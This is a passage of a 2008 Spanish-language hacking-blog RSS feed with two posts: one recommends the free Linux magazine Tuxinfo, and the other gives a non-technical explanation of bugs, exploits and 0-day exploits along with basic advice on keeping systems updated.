<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/allabouthack.wordpress.com/91/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/allabouthack.wordpress.com/91/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/91/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/91/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/91/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=91&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/05/21/intoduccion-al-cracking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>Revista</title>
		<link>http://allabouthack.wordpress.com/2008/05/17/revista/</link>
		<comments>http://allabouthack.wordpress.com/2008/05/17/revista/#comments</comments>
		<pubDate>Sat, 17 May 2008 22:20:40 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Revista]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=90</guid>
		<description><![CDATA[Han sacado una revista que no es nueva , pero que esta muy bien y se titula así &#8220;Tuxinfo&#8221; la primera revista digital de software libre de argentina. Esta revista es totalmente gratis . El link es el siguiente : http://www.tuxinfo.com.ar/tuxinfo/?p=1 Ya van por el numero 6 aunquepueden descargar los numero antiguos en la misma [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=90&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Han sacado una revista que no es nueva , pero que esta muy bien y se titula así &#8220;Tuxinfo&#8221; la primera revista digital de software libre de argentina. Esta revista es totalmente gratis .</p>
<p>El link es el siguiente : <a href="http://www.tuxinfo.com.ar/tuxinfo/?p=1">http://www.tuxinfo.com.ar/tuxinfo/?p=1</a></p>
<p>Ya van por el numero 6 aunquepueden descargar los numero antiguos en la misma web.</p>
<p><em>Un articulo del admin de la web sobre la 6 revista.</em></p>
<p><em>Bienvenidos a TuxInfo &#8220;Número 6&#8243;. Como todos los meses comienzo agradeciendo a todos ustedes por leernos mes a mes, a los colaboradores ya que sin ellos no se podría tener tanto contenido y de tan buena calidad, a nuestro corrector, y por supuesto a nuestra diseñadora quien intenta poner orden a todo el material y plasmarlo en una revista gratuita de excelente calidad como lo es TuxInfo.<br />
Ahora vayamos a explicar un poco lo que encontrarán en las páginas de esta edición, la nota de tapa está dirigida a la cobertura que realizamos en conjunto con mucha gente dispersa por el Flisol 2008 en toda Latino América, así es, contactamos a todos los organizadores del Flisol y gracias a eso es que podemos realizar un informe no solo local.<br />
Este mes también teníamos en mente ingresar como nota de tapa una review de Ubuntu 8.04 Hardy Heron, pero creímos que el Flisol 2008 era merecedor de la sección, de cualquier manera no dejen de leer la nota dedicada a Ubuntu ya que la misma tiene la estructura de tapa.<br />
Y como siempre encontrarán las secciones clásicas, como juegos, programación con su 5º edición del curso de C, una nota imperdible de Trac de la mano de nuestro nuevo colaborador Estevan Saavedra desde Bolivia, una nota de seguridad bajo squid, una review de Sabayon Linux, una primer entrega de Openoffice, y más.<br />
Los agradecimientos de siempre no podían faltar.</em></p>
<p>Espero que les guste</p>
<p>Un saludo.</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/allabouthack.wordpress.com/90/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/allabouthack.wordpress.com/90/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/90/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=90&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/05/17/revista/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>Bugs y exploits</title>
		<link>http://allabouthack.wordpress.com/2008/05/17/bugs-y-exploits/</link>
		<comments>http://allabouthack.wordpress.com/2008/05/17/bugs-y-exploits/#comments</comments>
		<pubDate>Sat, 17 May 2008 22:10:50 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Bugs y exploits]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=89</guid>
		<description><![CDATA[-  Bug?  Bug  en  inglés  significa  bicho.  Para  comprender  la  procedencia  de  este  término,  debemos  remitirnos  a  los  albores  de  la  informática.  Los  primeros  ordenadores  funcionaban  con  relés,  lámparas  de  vacío,  transistores…  todos  ellos  gigantes.  Por  entonces,  uno  de  los  problemas  a  solucionar  era  la  presencia  de  insectos  que  se  metían  entre  los  relés  (bugs: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=89&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span class="postbody">-  Bug?<br />
 Bug  en  inglés  significa  bicho.  Para  comprender  la  procedencia  de  este  término,  debemos  remitirnos  a  los  albores  de  la  informática.  Los  primeros  ordenadores  funcionaban  con  relés,  lámparas  de  vacío,  transistores…  todos  ellos  gigantes.  Por  entonces,  uno  de  los  problemas  a  solucionar  era  la  presencia  de  insectos  que  se  metían  entre  los  relés  (bugs:  bichitos)  haciendo  contacto  y  llegaban  a  hacer  que  aquellos  primitivos  ordenadores  dejaran  de  funcionar  o  lo  hicieran  erroneamente.  Por  eso  ahora  cuando  un  programa  tiene  un  fallo  se  dice  que  tiene  un  bug.  A  los  que  solucionan  estos  fallos  se  les  llaman  debuggers.<br />
 <br />
 -  Exploit?<br />
 Exploit,  significa  &#8221;explotar&#8221;,  y  estaria  mejor  traducido  si  dijeramos  &#8221;aprovechar&#8221;.<br />
 Aprovechar  vulnerabilidades,  es  decir,  bugs.<br />
 Los  exploits  suelen  ser  programas  que  aprovechan  determinadas  vulnerabilidades  para  de  esa  forma  obtener  privilegios  determinados,  o  cumplir  un  objetivo.<br />
 Los  exploits  0day  (del  dia  cero),  son  exploits  que  fueron  creados  generalmente  el  mismo  dia  en  que  se  descubre  una  vulnerabilidad,  y  estos  exploits,  no  son  publicos,  solo  tienen  acceso  a  ese  personas  allegadas  al  desarrollador  [coder,  programador]  del  mismo.<br />
 Son  logicamente  los  mas  efectivos,  porque  aprovechan  vulnerabilidades  que  aun  o  no  se  hicieron  publicas,  o  no  tienen  solucion  temporalmente.<br />
 <br />
 -  Y  como  me  cuido  de  los  exploits?<br />
 La  base  esta  en  tener  un  sistema  lo  mas  seguro  posible,  libre  de  vulnerabilidades,  eso  es  sencillamente  imposible,  por  eso  se  habla  de  &#8221;lo  mas  seguro  posible&#8221;.<br />
 Se  recomienda  actualizar  constantemente  el  sistema  operativo  y  los  servicios  que  en  él  se  ejecutan,  suscribirse  a  boletines  de  seguridad  y  vulnerabilidades  para  estar  al  tanto  de  lo  que  sucede  en  el  ambito  de  la  seguridad.  [BugTraq  @  Securityfocus].<br />
 <br />
 -  Soy  mal0r,  donde  busco  y  uso  exploits?<br />
 Hay  varios  sitios  donde  podes  encontrar  este  tipo  de  informacion,  es  cuestion  de  buscar,  y  estar  informado.<br />
 Vale  recordar  y  hacer  tambien,  que  personas  que  utilizan  exploits  a  mansalva  y  sin  saber  de  como  funcionan,  son  individuos  llamados  como  &#8221;Script  Kiddies&#8221;,  es  decir,  que  utilizan  scripts  para  obtener  algun  beneficio,  pero  sin  saber  lo  que  estan  realmente  haciendo,  y  esta  practica  no  esta  bien  vista,  ya  que  implica  un  uso  de  informacion  y  un  no-aporte  de  algo  nuevo,  y  como  dijimos  en  otras  secciones,  el  egoismo  no  es  para  nada  bien  visto  en  la  comunidad  under.</span></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/allabouthack.wordpress.com/89/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/allabouthack.wordpress.com/89/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/89/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=89&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/05/17/bugs-y-exploits/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
	</channel>
</rss>
